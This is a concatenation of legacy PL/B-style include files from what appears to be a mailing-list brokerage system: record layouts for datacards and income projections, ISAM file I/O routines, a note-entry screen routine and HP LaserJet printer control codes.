.Following was increased from 4 bytes
OWNNUM DIM 6 8-13 OWNER NUMBER (KEY FOR NINOWN CMPOWN FILES)
.Following 2 were added
DATFUL DIM 6 14-19 FULFILLMENT NUMBER
DATMAN DIM 6 20-25 MANAGER
DATMLR DIM 6 26-31 MAILER THIS WOULD NEGATE THE NEED FOR NINXRF.DAT!!!!!!!!!!
.Possibly need fields for LCR routing and for Payment
...............
.10 Category fields have been moved to a subsidiary file
NLSTCDE DIM 1 32-32 NEW LIST CODE (Y or N).
ELSTCDE DIM 1 33-33 EXCLUSIVE CODE (N, C or ).
. 'N' = NEW YORK, 'C'=CALIFORNIA, ' ' NONEXCLUSIVE
.START PATCH 6APR2005 REPLACED LOGIC
.COMMPER DIM 3 34-36 COMMISSION.
OLDCOMMPER DIM 3 34-36 COMMISSION. OBSOLETE FOR ALL NEWLY COMPILED PROGRAMS AS OF 4/6/2005
.END PATCH 6APR2005 REPLACED LOGIC
HOTLINE DIM 1 37-37 HOTLINE CODE (Y or N).
NEWDATE DIM 8 38-45 DATE CARD PUT UP CCYYMMDD FORMAT
REVDATE DIM 8 46-53 REVISION DATE CCYYMMDD FORMAT - PRINTED ON DATACARD
PASSWORD DIM 10 54-63 WHOM LAST UPDATED CARD - PRINTED ON DATACARD
MLSTNAME DIM 75 64-138 MASTER LIST NAME.
OLSTNAME DIM 35 139-173 ORDER LIST NAME.
.Addressing fields moved to subsidiary file
.Source Code fields moved to subsidiary file
.Arrangement fields moved to subsidiary file
.Selection fields moved to subsidiary file
.Mag Tape fields moved to subsidiary file
CLEANCDE DIM 4 174-177 CLEANED CODE (Cxxx).
CLNINFO DIM 38 178-215 CLEAN INFORMATION.
NETNAME DIM 4 216-219 NET NAME CODE (Nxxx).
NETINFO DIM 38 220-257 NET NAME INFORMATION.
DELCODE DIM 4 258-261 DELIVERY CODE (Dxxx).
SAMPLE DIM 4 262-265 SAMPLE CODE (Pxxx).
.Should following be put into a separate file?????
SEX DIM 15 266-280 SEX TEXT. OFF 1 BYTE
MIN DIM 11 281-291 MINIMUM TEXT.
UNIVERSE DIM 10 292-301 UNIVERSE QUANTITY.
DATPAY DIM 6 302-307 PAY-TO NUMBER.
NDATCONV DIM 1 308-308 CONVERSION BYTE
NDATEXCH DIM 1 309-309 1 = EITHER, 2 = EXCHANGE ONLY, 3 = RENTAL ONLY -- OBSOLETE!!! USING BYTE IN NINSEL INSTEAD
UNITDATA DIM 188 310-497
.Text Fields will be contained in subsidiary file
NDATWEB DIM 1 498-498 ALLOWED ON WEBSITE
NDATOFF DIM 1 499-499 1=OFFICE USE ONLY
NDATUPDDATE DIM 8 500-507 UPDATE DATE
NDATUPDINIT DIM 10 508-517 UPDATE INITS
NDATBUSY DIM 1 518-518
;begin patch 06July2004
NDatLUSAGE DIM 1 519-519 ; 'F' If we cannot sharelist usage info
.START PATCH 6APR2005 REPLACED LOGIC
.NDATFILL DIM 81 520-600 FILLER
COMMPER DIM 6 520-525 COMMISSION.
NDATFILL DIM 75 526-600 FILLER
.END PATCH 6APR2005 REPLACED LOGIC
;NDATFILL DIM 82 519-600 FILLER
;end patch 06July2004
.Eventually add following 2 fields:
. Verification Date - Data that List Owner last verified our datacard info
. Verification Schedule - Time frame when we start pestering List Owner about verifying our info.
LISTEND
<file_sep>/include/LSTIDD.INC
..............................................................................
.
. LSTIDD
. NIN Income PRojection data Descriptors
.
. FILE NAME : ListIproj.dat
. REC LENGTH: FIXED
. INDEX KEY : (1) 1- (List #, project year, proj #)
.
.INcome by List data descriptor
.used for List management income reporting to Owners
.
.
.
LSTINAME INIT "LSTIProj.ISI|NINS1:502"
LSTIFILE IFILE KEYLEN=13,FIXED=138,NODUPLICATES
LSTIFLD DIM 13
LSTIFLAG FORM 1
LSTIVARS LIST
LSTIList DIM 6 1-6 \
LSTIYear DIM 4 7-10 projection year } Key
LSTIproj dim 3 11-13 projection # /
LstIM1 FORM 9 14-22 projection for month 1 of year (may be fiscal see INCLdd)
LstIM2 FORM 9 23-31 projection for month 1 of year (may be fiscal see INCLdd)
LstIM3 FORM 9 32-40 projection for month 1 of year (may be fiscal see INCLdd)
LstIM4 FORM 9 41-49 projection for month 1 of year (may be fiscal see INCLdd)
LstIM5 FORM 9 50-58 projection for month 1 of year (may be fiscal see INCLdd)
LstIM6 FORM 9 59-67 projection for month 1 of year (may be fiscal see INCLdd)
LstIM7 FORM 9 68-76 projection for month 1 of year (may be fiscal see INCLdd)
LstIM8 FORM 9 77-85 projection for month 1 of year (may be fiscal see INCLdd)
LstIM9 FORM 9 86-94 projection for month 1 of year (may be fiscal see INCLdd)
LstIM10 FORM 9 97-103 projection for month 1 of year (may be fiscal see INCLdd)
LstIM11 FORM 9 104-112 projection for month 1 of year (may be fiscal see INCLdd)
LstIM12 FORM 9 113-121 projection for month 1 of year (may be fiscal see INCLdd)
LSTIDate Dim 17 122-138 date time projected - yyyymmddhhmmsssss
listend
<file_sep>/include/NONOCODE.INC
*...........................................................
*KEYNOTE - ADD A NEW ORDER NOTE.
* required = KEY (list rental number)
*...........................................................
KEYNOTE
TRAPCLR F3
TRAPCLR F4
display *savesw
CLOCK DATE TO DATE
UNPACK DATE INTO Mm,STR1,Dd,STR1,Yy
REP ZFILL,Dd
REP ZFILL,Mm
PACK NDATE FROM Mm,Dd,Yy,CC
MOVE KEY TO NOTEKEY
CLOCK TIME TO str8
UNPACK str8 INTO HH,STR1,MN
PACK NTIME FROM HH,MN
MOVE TYPINIT TO NINITS
CLEAR NLINE1
CLEAR NLINE2
CLEAR NLINE3
CLEAR NLINE4
CLEAR NLINE5
CLEAR NLINE6
.
DISPLAY *P1:16,*EF,*HON,"ENTER NOTE FOR LR:",*HOFF,*P1:17:
"LR : ",NOTEKEY:
*P1:18,NLINE1:
*P1:19,NLINE2:
*P1:20,NLINE3:
*P1:21,NLINE4:
*P1:22,NLINE5:
*P1:23,NLINE6
NLINE1 MOVE NLINE1 TO SAVE
KEYIN *P1:18,*RV,*+,NLINE1
SCAN STAR IN NLINE1
GOTO EXNOTES IF EQUAL
SCAN LBRAK IN NLINE1
GOTO EXNOTES IF EQUAL
SCAN RBRAK IN NLINE1
GOTO NLINE1X IF EQUAL
DISPLAY *P1:18,NLINE1
GOTO NLINE2
NLINE1X MOVE SAVE TO NLINE1
DISPLAY *P1:18,NLINE1
.
NLINE2 MOVE NLINE2 TO SAVE
KEYIN *P1:19,*RV,*+,NLINE2
SCAN STAR IN NLINE2
GOTO EXNOTES IF EQUAL
GOTO KEYNOTE1 IF EOS
SCAN LBRAK IN NLINE2
GOTO NLINE1 IF EQUAL
SCAN RBRAK IN NLINE2
GOTO NLINE2X IF EQUAL
DISPLAY *P1:19,NLINE2
GOTO NLINE3
NLINE2X MOVE SAVE TO NLINE2
DISPLAY *P1:19,NLINE2
.
NLINE3 MOVE NLINE3 TO SAVE
KEYIN *P1:20,*RV,*+,NLINE3
SCAN STAR IN NLINE3
GOTO EXNOTES IF EQUAL
GOTO KEYNOTE1 IF EOS
SCAN LBRAK IN NLINE3
GOTO NLINE2 IF EQUAL
SCAN RBRAK IN NLINE3
GOTO NLINE3X IF EQUAL
DISPLAY *P1:20,NLINE3
GOTO NLINE4
NLINE3X MOVE SAVE TO NLINE3
DISPLAY *P1:20,NLINE3
.
NLINE4 MOVE NLINE4 TO SAVE
KEYIN *P1:21,*RV,*+,NLINE4
SCAN STAR IN NLINE4
GOTO KEYNOTE1 IF EOS
GOTO EXNOTES IF EQUAL
SCAN LBRAK IN NLINE4
GOTO NLINE3 IF EQUAL
SCAN RBRAK IN NLINE4
GOTO NLINE4X IF EQUAL
DISPLAY *P1:21,NLINE4
GOTO NLINE5
NLINE4X MOVE SAVE TO NLINE4
DISPLAY *P1:21,NLINE4
.
NLINE5 MOVE NLINE5 TO SAVE
KEYIN *P1:22,*RV,*+,NLINE5
SCAN STAR IN NLINE5
GOTO EXNOTES IF EQUAL
GOTO KEYNOTE1 IF EOS
SCAN LBRAK IN NLINE5
GOTO NLINE4 IF EQUAL
SCAN RBRAK IN NLINE5
GOTO NLINE5X IF EQUAL
DISPLAY *P1:22,NLINE5
GOTO NLINE6
NLINE5X MOVE SAVE TO NLINE5
DISPLAY *P1:22,NLINE5
NLINE6 MOVE NLINE6 TO SAVE
KEYIN *P1:23,*RV,*+,NLINE6
SCAN STAR IN NLINE6
GOTO EXNOTES IF EQUAL
GOTO KEYNOTE1 IF EOS
SCAN LBRAK IN NLINE6
GOTO NLINE5 IF EQUAL
SCAN RBRAK IN NLINE6
GOTO NLINE6X IF EQUAL
DISPLAY *P1:23,NLINE6
GOTO KEYNOTE1
NLINE6X MOVE SAVE TO NLINE6
DISPLAY *P1:23,NLINE6
.
KEYNOTE1 KEYIN *P1:24,*EL,*P20:24,"ALL OK ? ",*-,STR1;
CMATCH STAR IN STR1
GOTO EXNOTES IF EQUAL
CMATCH NO TO STR1
GOTO NLINE1 IF EQUAL
MOVE key TO NONOFLD
CALL NONOWRT
EXNOTES
. display *scrnrst 1
display *restsw
TRAP keynote if F4
TRAP dissnote if F3
return
*...........................................................
*DISSNOTE - DISPLAY ANY ORDER NOTES.
* REQUIRED: KEY (LR NUMBER FROM ORDER OR INVOICE PROG.)
*...........................................................
DISSNOTE
. TRAPCLR F2
TRAPCLR F3
TRAPCLR F4
. display *scrnsave 1
display *savesw
TRAP DISSNOTE IF F3
MOVE KEY TO NONOFLD
CALL NONOKEY
MATCH KEY TO NOTEKEY *CORRECT RECORD?
GOTO NONOTE IF NOT EQUAL * NO
DISNOTE1 UNPACK NDATE INTO Mm,dd,yy,CC
UNPACK NTIME INTO HH,MN
DISPLAY *P1:17,*EF:
"LR : ",NOTEKEY,*P14:17,"DATED : ",Mm,"/",Dd,"/",CC,Yy:
" ",HH,":",MN," By ",NINITS:
*P1:18,NLINE1:
*P1:19,NLINE2:
*P1:20,NLINE3:
*P1:21,NLINE4:
*P1:22,NLINE5:
*P1:23,NLINE6
KEYIN *P20:24,"Enter to continue, (P)rior Note",STR1,*P20:24,*EL;
CMATCH STAR IN STR1
GOTO NONOTE1 IF EQUAL
CMATCH "P" IN STR1
GOTO PRENOTE IF EQUAL
CALL NONOKS
MATCH KEY TO NOTEKEY
GOTO DISNOTE1 IF EQUAL
GOTO NONOTE
.
PRENOTE CALL NONOKP
MATCH KEY TO NOTEKEY
GOTO DISNOTE1 IF EQUAL
.........
NONOTE DISPLAY *P20:23,*EL,"NO (MORE) NOTES FOUND :",*B,*W2:
*P20:23,*EL;
NONOTE1
. display *scrnrst 1
display *restsw
TRAP keynote if F4
TRAP dissnote if F3
return
.............................................................
<file_sep>/include/MDCMaindd.inc
.******************************************************
.* MIN List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* MIN DATACARD FILES.
.* ****************************************************
.
. FILE: MDC_MAIN
. LENGTH: Variable
. COMPRESS: NONE
. TYPE: FLAT Comma Delimited - Note all these files come CSV from Min if there is not a hit
. on our system they get put into an indexed/aimdexed file for review
......................................................
. LAST MODIFIED
. patch 1.0 14 August 2006 DLH New
.Secondary FIles See
.MDCSEGADD - Segment info universe & $
.MDSMSCDD - Misc addressing Min, UOS,Gender,Media,net
.MDC035DD - CAtegory
.MDC091DD - Owner ???? data no supplied
.MDC090DD - Owner
.MDCTXTDD - Text
......................................................
MinNAME Init "MDC_Main.Isi|NINS1:502"
.MinFILE FILE Name="MDCMain.ISI|NINS1:502"
.
MinFlist Filelist
MinFILE IFILE fixed=438,Name="MDC_Main.Isi|NINS1:502"
MinFILE2 AFILE fixed=438,Name="MDC_Main.AAm|NINS1:502"
FilelistEnd
MinSFile File
.MinSFile File Name="MDCMain.csv|NINS1:502"
MinFLAG FORM 1
MinPATH FORM 1
MinFLd Dim 6
Minfld2 Dim 53 .aim key
MInCSVSTR DIM 800
.
MinMainVARS LIST .for ease I am using Min's names
DDCNOa Dim 6 1-6 datacard number .'a' cause dupe from MDC_MSC file
LSType Dim 1 7-7 card Type
DTTL Dim 50 8-57 Title .'a' cause dupe from MDC_MSC file
DMKEY Dim 5 58-62 Customer key
DMDCNO Dim 6 63-68 CHAR Rep Datacard # (is this the old #?)
DLOW Dim 5 69-73 List Owner Code
GNAMa DIM 25 74-98 List Owner Name .'a' because dupe from MDC090 file
DRET Dim 5 99-103 Tape REturn Code
BUCO Dim 1 104-104 Business / Consumer
NTNLT Dim 1 106-105 Nationality
DDTE8 dim 8 106-113 Datacard date CCYYMMDD
GPH1a Dim 11 114-124 Owner phone .'a' because dupe from MDC090 file
GPHFa Dim 11 125-135 Owner Fax .'a' because dupe from MDC090 file
DCNT Dim 25 136-160 Owner COntact
LOEML Dim 50 161-210 Owner Email
COMMMIn Form 3.2 211-216 Commission 3.2 .'Min - cause dupe
DDNU8 dim 8 217-224 next update
DDTR8 dim 8 225-232 Revised date
DDTC8 dim 8 233-240 Confirm date
DDDT8 dim 8 241-248 Update date
FNAM DIM 25 249-273 Return Tape Name
FemPer Form 3.2 274-279 percent female 3.2
MalPer Form 3.2 280-285 percent male 3.2
UYESNO Dim 7 286-292 UNit of sale yes/no
UOSLOW Form 5.2 292-300 Average UOS Low 5.2
UOSHigh Form 5.2 301-308 Average UOS High 5.2
UOSAvG Form 5.2 309-316 Average UOS average 5.2
UNIV Dim 9 317-325 Universe
MinDoll form 5.2 326-333 Minimum dollar order 5.2
MinNME Dim 9 334-342 Minimum Names order
MinNet Dim 9 343-351 Minimum Net Names order
KEYCDE Form 5.2 352-359 Key code charges 5.2
NETNAMEa DIM 7 360-366 net name yes/no 'a' appended dupes our name
NMEPER form 3.2 367-372 Net Name percentage 3.2
RUNCHG form 5.2 373-380 running charges 5.2
RUNUNITS Dim 1 381-381 run units l/m
WBSTE Dim 50 382-431 LO Website
DDLTa Dim 1 432-432 "A"ctive "I"nactive .'a' cause dupe from MDC_MSC file
JLSTSTS DIm 1 433-433 List Status S,E,T,I,A
JPARENT Dim 5 434-438
LISTEND
MinMainVARS1 LIST .CSV FIle
CDDCNOa Dim 6 1-6 datacard number .'a' cause dupe from MDC_MSC file
CLSType Dim 1 7-7 card Type
CDTTL Dim 50 8-57 Title .'a' cause dupe from MDC_MSC file
CDMKEY Dim 5 58-62 Customer key
CDMDCNO Dim 6 63-68 CHAR Rep Datacard # (is this the old #?)
CDLOW Dim 5 69-73 List Owner Code
CGNAMa DIM 25 74-98 List Owner Name .'a' because dupe from MDC090 file
CDRET Dim 5 99-103 Tape REturn Code
CBUCO Dim 1 104-104 Business / Consumer
CNTNLT Dim 1 106-105 Nationality
CDDTE8 dim 8 106-113 Datacard date CCYYMMDD
CGPH1a Dim 11 114-124 Owner phone .'a' because dupe from MDC090 file
CGPHFa Dim 11 125-135 Owner Fax .'a' because dupe from MDC090 file
CDCNT Dim 25 136-160 Onwer COntact
CLOEML Dim 50 161-210 Owner Email
CCOMMMIn dIM 5 211-216 Commission 3.2 .'Min - cause dupe
CDDNU8 dim 8 217-224 next update
CDDTR8 dim 8 225-232 Revised date
CDDTC8 dim 8 233-240 Confirm date
CDDDT8 dim 8 241-248 Update date
CFNAM DIM 25 249-273 Return Tape Name
CFemPer dIM 5 274-279 percent female 3.2
CMalPer dIM 5 280-285 percent male 3.2
CUYESNO Dim 7 286-292 UNit of sale yes/no
CUOSLOW dIM 7 292-300 Average UOS Low 5.2
CUOSHigh DIM 7 301-308 Average UOS High 5.2
CUOSAvG DIM 7 309-316 Average UOS average 5.2
CUNIV Dim 9 317-325 Universe
CMinDoll dIM 7 326-333 Minimum dollar order 5.2
CMinNME Dim 9 334-342 Minimum Names order
CMinNet Dim 9 343-351 Minimum Net Names order
CKEYCDE dIM 7 352-359 Key code charges 5.2
CNETNAME DIM 7 360-366 net name yes/no
CNMEPER dIM 5 367-372 Net Name percentage 3.2
CRUNCHG dIM 7 373-380 running charges 5.2
CRUNUNITS Dim 1 381-381 run units l/m
CWBSTE Dim 50 382-431 LO Website
CDDLTa Dim 1 432-432 "A"ctive "I"nactive .'a' cause dupe from MDC_MSC file
CJLSTSTS DIm 1 433-433 List Status S,E,T,I,A
CJPARENT Dim 5 434-438
LISTEND
<file_sep>/include/cvtdd.inc
.cvtdd.inc
.created 17June98 DLH
.
CVTFLD DIM 10 WORK FIELD USED FOR MP CONVERSION.
MPCHANGE INIT "}0J1K2L3M4N5O6P7Q8R9"
MPCHARS INIT "}JKLMNOPQR" VALID MINUS OVERPUNCH CHARACTERS
NUM10 FORM 10
<file_sep>/include/NWFXIO.INC
..............................................................................
.
. NWFXio INCLUSION
. NWFX Stats FILE DEFINITION
.
. FILE NAME : NWFXref
. REC LENGTH: FIXED
. INDEX KEY :
..............................................................................
.
..............................................................................
.
. ENTRY POINT : NWFXKEY
. REQUIRED : 'NWFXFLD'
. RETURNED : SPECIAL INSTRUCTION RECORD
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
NWFXKEY BRANCH NWFXFLAG TO NWFX1
CALL NWFXOPEN
NWFX1 FILEPI 1;NWFXFILE
READ NWFXFILE,NWFXFLD;NWFXVARS
RETURN
..............................................................................
.
. ENTRY POINT : NWFXTST
. REQUIRED : MKEY
. RETURNED :
. DESCRIPTION : TEST KEY
.
NWFXTST BRANCH NWFXFLAG TO NWFX2
CALL NWFXOPEN
NWFX2 FILEPI 1;NWFXFILE
READ NWFXFILE,NWFXFLD;STR1
RETURN
..............................................................................
.
. ENTRY POINT : NWFXKS
. REQUIRED :
. RETURNED : SPECIAL INSTRUCTION RECORD
. DESCRIPTION : KEY SEQUENTIAL SPECIAL INSTRUCTION FILE READ
.
NWFXKS BRANCH NWFXFLAG TO NWFX3
CALL NWFXOPEN
NWFX3 FILEPI 1;NWFXFILE
READKS NWFXFILE;NWFXVARS
RETURN
..............................................................................
.
. ENTRY POINT : NWFXSEQ
. REQUIRED :
. RETURNED : SPECIAL INSTRUCTION RECORD
. DESCRIPTION : SEQUENTIAL SPECIAL INSTRUCTION FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
NWFXSEQ BRANCH NWFXFLAG TO NWFX4
CALL NWFXOPEN
NWFX4 FILEPI 1;NWFXFILE
READ NWFXFILE,SEQ;NWFXVARS
RETURN
..............................................................................
.
. ENTRY POINT : NWFXWRT
. REQUIRED :
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
NWFXWRT BRANCH NWFXFLAG OF NWFX5
CALL NWFXOPEN
NWFX5 FILEPI 1;NWFXFILE
WRITE NWFXFILE,NWFXFLD;NWFXVARS
RETURN
..............................................................................
.
. ENTRY POINT : NWFXUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE SPECIAL INSTRUCTION FILE
.
NWFXUPD BRANCH NWFXFLAG TO NWFX6
CALL NWFXOPEN
NWFX6 FILEPI 1;NWFXFILE
UPDATE NWFXFILE;NWFXVARS
RETURN
..............................................................................
.
. ENTRY POINT : NWFXDEL
. REQUIRED : 'MKEY'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
NWFXDEL BRANCH NWFXFLAG TO NWFX7
CALL NWFXOPEN
NWFX7 FILEPI 1;NWFXFILE
DELETE NWFXFILE,NWFXFLD
RETURN
..............................................................................
.
. ENTRY POINT : NWFXOPEN
. REQUIRED : 'NWFXFLAG'
. RETURNED : 'NWFXFLAG' SET TO '1' IF OPENNED
. DESCRIPTION : OPEN NIN SPECIAL INSTRUCTION FILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
NWFXOPEN TRAP NWFXGONE IF IO
OPEN NWFXFILE,NWFXNAME
TRAPCLR IO
MOVE C1 TO NWFXFLAG
RETURN
.
NWFXGONE MOVE NWFXNAME TO FILENAME
CALL FILEGONE
.
..............................................................................
.END OF INCLUDE
<file_sep>/include/ncltdd.inc
******************************************************
* NCLTDD INCLUSION
* CONSULTANT/CLIENT CROSS REFERENCE FILE (FOR WEBSITE PURPOSES)
* NOTE: THIS DD MAY BE TEMPORARY!!!
. ....................................................
* ****************************************************
* NAMES IN THE NEWS CONSULTANT/CLIENT CROSS REFERENCE FILE.
* ****************************************************
. release 1.0 2005 December 12 ASH Original Release
.
. FILE: NINCLT
. LENGTH: 50
. TYPE: AIM,ISAM,MANAGED
. INDEX KEY: 1-14 NCLTCONSULT + NCLTCLIENT + NCLTNUM
.AIMDEX KEY: 1-6 NCLTCONSULT
. 7-12 NCLTCLIENT
......................................................
NCLTNAME INIT "NINCLT"
NCLTFLIST FILELIST
NCLTFILE IFILE KEYLEN=9,FIXED=50,Name="NINCLT.isi|NINS1:502"
NCLTFLE2 AFILE FIXED=50,Name="NINCLT.aam|NINS1:502"
FILELISTEND
NCLTLOCK FORM 1 0 OR 1=filepi,2=recordlock, 3=no lock
NCLTFLD DIM 145
NCLTFLD1 DIM 9
NCLTFLD2 DIM 9
NCLTFLAG FORM 1
NCLTPATH FORM 1
.
NCLTVARS LIST
NCLTCONSULT DIM 6 1-6 Consultant Number (ISAM/AAM)
NCLTCLIENT DIM 6 7-12 Client Number (ISAM/AAM)
NCLTNUM DIM 2 13-14 Unique Number (Allow up to 99 new entries) (ISAM)
NCLTSDATE DIM 8 15-22 Relationship Start Date
NCLTEDATE DIM 8 23-30 Relationship End Date
NCLTTYPE DIM 1 31-31 Type of Consultant: " "=Regular, "1"=Consultant may not have their name on Orders, therefore allow them to view Orders for their Clients where the Broker field is blank (this can be dangerous!)
NCLTFILLER DIM 19 32-50 Filler
LISTEND
<file_sep>/include/P4450.INC
.::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
. HPLJII
. Control codes for the
. HP Laserjet Series II printer.
.
. Software is custom written and Fonts for the HP Laserjet II
. have been custom tailored for American Cyanamid by
.
. C.H.E.S. System Services 01-15-88
.
.::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
.
. Control characters for choosing fonts of different point sizes
.
HP06PT INIT 033,"(6X" 06 point
HP10PT INIT 033,"(0X" 10 point
HP11PT INIT 033,"(1X" 11 point
HP12PT INIT 033,"(2X" 12 point bold
HP14PT INIT 033,"(4X" 14 point bold
.
HPCOUR INIT 033,"(s3T" Courier typeface
HPLINE INIT 033,"(s0T" Line Printer typeface
HPHELV INIT 033,"(s4T" Helvetica typeface
HPTMSRMN INIT 033,"(s5T" Times Roman typeface
HPPRES INIT 033,"(s8T" Prestige Elite typeface
HPGOTHIC INIT 033,"(s6T" Gothic typeface
.
. Control characters for horizntl tab position from the left margin
.
HPT000 INIT 033,"*p000X" 0.00 inches from left margin
HPT025 INIT 033,"*p100X" 0.25 inches from left margin
HPT150 INIT 033,"*p450X" 1.50 inches from left margin
HPT175 INIT 033,"*p500X" 1.75 inches from left margin
HPT200 INIT 033,"*p600X" 2.00 inches from left margin
HPT225 INIT 033,"*p700X" 2.25 inches from left margin
HPT250 INIT 033,"*p750X" 2.50 inches from left margin
HPT300 INIT 033,"*p900X" 3.00 inches from left margin
HPT325 INIT 033,"*p950X" 3.25 inches from left margin
HPT350 INIT 033,"*p1050X" 3.50 inches from left margin
HPT375 INIT 033,"*p1100X" 3.75 inches from leftmargin
HPT400 INIT 033,"*p1150X" 4.00 inches from left margin
HPT450 INIT 033,"*p1300X" 4.50 inches from left margin
HPT475 INIT 033,"*p1425X" 4.75 inches from left margin
HPT525 INIT 033,"*p1600X" 5.25 inches from left margin
HPT550 INIT 033,"*p1700X" 5.20 inches from left margin
HPT575 INIT 033,"*p1725X" 5.75 inches from left margin
HPT650 INIT 033,"*p2000X" 6.50 inches from left margin
.
. Control characters for vertical tab position
.
HPVU01 INIT 033,"&a-1R" 1 Line up from current position
HPVU02 INIT 033,"&a-2R" 2 Lines up from current position
.
.
. Control characters for drawing a line
. LN1 = Across page, LN2 = Right half of page
.
HPLN1 INIT 033,"*c2400a10b0p",033,"*p+60Y"
HPLN2 INIT 033,"*p-22Y",033,"*p600X",033,"*c1800a02b0p"
.
. e.w. lake beginning to wreck havoc...
.
HPRESET INIT 033,"E"
.
HPBON INIT 033,"(s3B" Bold on
HPBOFF INIT 033,"(s0B" Bold off
.
HPUNON INIT 033,"&dD" Underline on
HPUNOFF INIT 033,"&d@" Underline off
.
HPLIN6 INIT 033,"&l6D" 6 lines per inch
HPLIN8 INIT 033,"&l8D" 8
.
. left right top bottom
HPLETTER INIT 033,"&a13L",033,"&a72M",033,"&l13E",033,"&l60F"
HPPORT INIT 033,033,"H,P,FR1;"
HPLAND INIT 033,033,"H,L,FR5;"
.
.
. symbol set
. / spacing
. / / pitch
. / / / point
. / / / / style
. / / / / / stroke weight
. | | | | | / typeface
. | | | | | | /
.
HPGOTH12 INIT 033,"(8U",033,"(s0p12.00h12.00v0s-2b6T"
HPGOTH10 INIT 033,"(8U",033,"(s0p14.29h10.00v0s-2b6T"
.
HPDTCH12 INIT 033,"(8U",033,"(s1p12.00v0s-2b4T"
HPDTCH10 INIT 033,"(8U",033,"(s1p10.69v0s-2b4T"
HPDTCH85 INIT 033,"(8U",033,"(s1p08.50v0s-2b4T"
.
PDTCH12 INIT 033,"(s5t",033,"s1P",033,"(s12V",033,"(s0S",033,"(s5T"
PDTCH10 INIT 033,"(s5t",033,"s1P",033,"(s10V",033,"(s0S",033,"(s5T"
PDTCH85 INIT 033,"(s5t",033,"s1P",033,"(s08V",033,"(s0S",033,"(s5T"
.
PGOTH12 INIT 033,"(s5t",033,"s1P",033,"(s12V",033,"(s0S",033,"(s6T"
PGOTH10 INIT 033,"(s5t",033,"s1P",033,"(s10V",033,"(s0S",033,"(s6T"
PGOTH85 INIT 033,"(s5t",033,"s1P",033,"(s08V",033,"(s0S",033,"(s6T"
.
HPSHADE INIT 033,"*p325x1400Y": position cursor
033,"*c1900A": width
033,"*c600B": height
033,"*c10G": area fill%
033,"*c2P" print it
.
HPTTRAY INIT 033,"&l1H" top tray
HPBTRAY INIT 033,"&l4H" bottom tray
<file_sep>/include/GNXTIO.INC
..............................................................................
.
. GNXTIO INCLUSION
. NIN RECORD NUMBER IO INCLUSION
.
. FILE NAME : NIGNXT
. REC LENGTH: 14 FIXED
. INDEX KEY : 1-8
.
..............................................................................
.
GNXTKEY BRANCH GNXTFLAG OF GNXT1
CALL GNXTOPEN
GNXT1 FILEPI 1;GNXTFILE
READ GNXTFILE,GNXTFLD;GNXTKEY:
GNXTNUM
RETURN
..............................................................................
.
. ENTRY POINT : GNXTTST
. REQUIRED : GNXTFLD
. RETURNED :
. DESCRIPTION : TEST KEY
.
GNXTTST BRANCH GNXTFLAG TO GNXT2
CALL GNXTOPEN
GNXT2 FILEPI 1;GNXTFILE
READ GNXTFILE,GNXTFLD;STR1
RETURN
..............................................................................
.
. ENTRY POINT : GNXTKS
. REQUIRED :
. RETURNED : RECORD NUMBER RECORD
. DESCRIPTION : KEY SEQUENTIAL RECORD NUMBER FILE READ
.
GNXTKS BRANCH GNXTFLAG TO GNXT3
CALL GNXTOPEN
GNXT3 FILEPI 1;GNXTFILE
READKS GNXTFILE;GNXTKEY:
GNXTNUM
RETURN
..............................................................................
.
. ENTRY POINT : GNXTSEQ
. REQUIRED :
. RETURNED : RECORD NUMBER RECORD
. DESCRIPTION : SEQUENTIAL RECORD NUMBER FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
GNXTSEQ BRANCH GNXTFLAG TO GNXT4
CALL GNXTOPEN
GNXT4 FILEPI 1;GNXTFILE
READ GNXTFILE,SEQ;GNXTKEY:
GNXTNUM
RETURN
..............................................................................
.
. ENTRY POINT : GNXTWRT
. REQUIRED : 'GNXTFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
GNXTWRT BRANCH GNXTFLAG TO GNXT5
GOTO GNXT5 IF EQUAL
CALL GNXTOPEN
GNXT5 FILEPI 1;GNXTFILE
WRITE GNXTFILE,GNXTFLD;GNXTKEY:
GNXTNUM
RETURN
..............................................................................
.
. ENTRY POINT : GNXTUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE RECORD NUMBER FILE
.
GNXTUPD BRANCH GNXTFLAG TO GNXT6
CALL GNXTOPEN
GNXT6 FILEPI 1;GNXTFILE
UPDATE GNXTFILE;GNXTKEY:
GNXTNUM
RETURN
..............................................................................
.
. ENTRY POINT : GNXTDEL
. REQUIRED : 'GNXTFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
GNXTDEL BRANCH GNXTFLAG TO GNXT7
CALL GNXTOPEN
GNXT7 FILEPI 1;GNXTFILE
DELETE GNXTFILE,GNXTFLD
RETURN
...............................................................................
.
. ENTRY POINT : GNXTOPEN
. REQUIRED : 'GNXTFLAG'
. RETURNED : 'GNXTFLAG' SET TO '1' IF OPENNED
. DESCRIPTION : OPEN NIN RECORD NUMBER FILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
GNXTOPEN TRAP GNXTGONE IF IO
OPEN GNXTFILE,GNXTNAME
TRAPCLR IO
MOVE C1 TO GNXTFLAG
RETURN
.
GNXTGONE MOVE GNXTNAME TO FILENAME
CALL FILEGONE
.
..............................................................................
<file_sep>/include/BRKHELP.INC
.............................................................................
.
.ENTER WITH - TOPWIND,BOTWIN,LWIND,RWIND - TO DEFINE WINDOW.
.EXIT WITH - brkNUM, brCOMP, NEED TO MOVE TO OTHER VARIABLES AND RETURN AT .
. EXIT PARAGRAPH.
.
. sep 93 DLH.
.............................................................................
brkHELP CLEAR STR2
MOVE TOPWIND TO STR2
TYPE STR2 *VALID NUMBER?
CALL bsetWIN IF NOT EQUAL
CALL bsetWIN IF EOS
COMPARE C0 TO TOPWIND
CALL bsetWIN IF NOT GREATER
